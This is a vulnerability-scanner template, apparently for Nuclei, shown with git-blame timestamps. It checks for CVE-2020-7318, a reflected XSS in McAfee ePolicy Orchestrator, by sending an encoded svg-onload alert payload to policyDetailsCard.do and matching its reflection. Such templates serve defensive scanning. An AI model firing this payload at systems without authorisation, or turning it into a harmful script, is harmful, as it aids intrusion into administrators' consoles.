2021-01-02 04:56:15 +00:00
|
|
|
id: CVE-2020-7318
|
2020-12-09 08:54:40 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: McAfee ePolicy Orchestrator Reflected XSS
|
|
|
|
author: dwisiswant0
|
|
|
|
severity: medium
|
|
|
|
description: |
|
|
|
|
Cross-Site Scripting vulnerability in McAfee ePolicy Orchestrator (ePO)
|
|
|
|
prior to 5.10.9 Update 9 allows administrators to inject arbitrary web
|
|
|
|
script or HTML via multiple parameters where the administrator's entries
|
|
|
|
were not correctly sanitized.
|
|
|
|
|
2021-08-18 11:29:20 +00:00
|
|
|
reference:
|
2020-12-09 08:54:40 +00:00
|
|
|
- https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
|
2021-02-05 19:44:41 +00:00
|
|
|
tags: cve,cve2020,xss
|
2020-12-09 08:54:40 +00:00
|
|
|
|
|
|
|
requests:
|
2021-01-10 22:39:54 +00:00
|
|
|
- raw:
|
2020-12-09 08:54:40 +00:00
|
|
|
- |
|
|
|
|
GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1
|
2021-01-10 22:39:54 +00:00
|
|
|
Host: {{Hostname}}
|
2020-12-09 08:54:40 +00:00
|
|
|
Connection: close
|
2021-01-10 22:39:54 +00:00
|
|
|
|
2020-12-09 08:54:40 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "text/html"
|
|
|
|
part: header
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "Policy Name"
|
|
|
|
- "'\"><svg/onload=alert(document.domain)>"
|
|
|
|
condition: and
|
|
|
|
part: body
|